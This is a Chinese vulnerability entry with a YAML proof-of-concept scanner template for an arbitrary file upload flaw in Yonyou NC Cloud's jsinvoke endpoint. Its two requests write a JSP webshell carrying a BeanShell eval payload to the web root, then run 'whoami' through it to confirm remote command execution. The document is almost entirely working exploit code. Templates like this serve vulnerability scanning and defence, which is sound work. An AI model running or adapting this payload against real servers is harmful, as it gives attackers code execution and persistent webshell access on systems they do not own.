漏洞描述
用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限
app="用友-NC-Cloud"
yonyou-cloud-jsinvoke-uploadfile: 用友 NC Cloud jsinvoke 任意文件上传
PoC代码[已公开]
id: yonyou-cloud-jsinvoke-uploadfile
info:
name: 用友 NC Cloud jsinvoke 任意文件上传
author: zan8in
severity: critical
verified: true
description: |
用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限
app="用友-NC-Cloud"
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20Cloud%20jsinvoke%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
tags: yonyou,fileupload
created: 2023/08/09
set:
r1: randomLowercase(6)
rules:
r0:
request:
method: POST
path: /uapjs/jsinvoke/?action=invoke
headers:
Content-Type: application/json
body: |
{
"serviceName":"nc.itf.iufo.IBaseSPService",
"methodName":"saveXStreamConfig",
"parameterTypes":[
"java.lang.Object",
"java.lang.String"
],
"parameters":[
"${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
"webapps/nc_web/{{r1}}.jsp"
]
}
expression: response.status == 200
r1:
request:
method: GET
path: /{{r1}}.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())
expression: |
response.status == 200 &&
response.body.ibcontains(b'<string>') &&
response.body.ibcontains(b'<string>') &&
response.body.ibcontains(b'</string>') &&
response.body.ibcontains(b'<?xml') &&
(response.body.ibcontains(b'administrator') || response.body.ibcontains(b'root'))
expression: r0() && r1()